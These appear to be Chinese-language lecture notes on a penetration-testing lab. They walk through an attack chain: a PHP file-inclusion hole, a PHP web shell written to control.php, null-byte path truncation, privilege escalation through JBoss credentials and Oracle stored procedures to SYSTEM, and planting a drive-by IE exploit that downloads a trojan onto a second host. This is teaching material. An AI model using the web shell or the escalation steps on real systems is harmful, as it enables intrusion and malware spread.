由于仅仅是听课笔记,错漏均会有,原理是正确的
1.环境
主机1 192.168.0.101
1)win2003操作系统
2)开启apache+mysql+php+wordpress
其中 apache以低权限用户webmaster运行,使用端口80
wordpress暴露漏洞形式如下
XXX.php
$path_array = array(
"xxxpath" => "../../"
...
);
$postValue = $_POST;
$tmpArray = array_merge($path_array,$_POST);
include_once($tmpArray["xxxpath"]."YYY.php");
3)开启jboss+oracle
其中jboss以webmaster权限运行,使用端口1003
oracle以默认的system权限运行
4)防火墙开启,仅仅允许80,1003
主机2 192.168.0.102
1)win8 操作系统
2)ie低版本
3)脚本命令ie不断访问 192.168.0.101 首页
4)防火墙开启,仅仅允许80端口
攻击机 192.168.0.103
2.渗透过程
主机1
1)wordpress漏洞->apache web->low privilege
2)jboss->oracle->oracle dba->system privilege
主机2
3)apache web index.html->挂马->ie低版本漏洞->主机2
3.具体过程
1)上传cmd.txt文本,其内容为一个web shell形式如下
<?php
$contents ="<?php
system($_REQUEST["cmd"]);
?>"; #记得不太清,大致是这个意思
file_put_contents("control.php",$contents); ###目的就是制作一个控制脚本到服务器上
?>
2)构造链接
XXX.php?xxxpath="xxx/cmd.txt%00"
从而使得
XXX.php中产生 include_once("xxx/cmd.txt%00"."YYY.php"); ##这导致%00后面的东西被截断,而cmd.txt被执行,从而生成control.php到服务器端
此时已取得webmaster的权限,可以用菜刀等软件直接操作webmaster的各项权限
3)由于有webmaster 权限,此时可以查看jboss链接oracle的账号密码,即可得到oracle的低级权限
4)通过oracle的尚未被去掉的提权接口,升级为oracle dba
5)将用户切换为oracle dba 此时可以书写 java 存储过程,此存储过程是system权限,此时实际已经得到系统的超级用户权限
6)可以书写java存储过程添加win2003系统管理员用户
7)在主机1的 index.php 中挂马,针对早期ie的缓冲区溢出
8)主机2访问index.php导致ie中的缓冲区溢出执行给定的下载木马并执行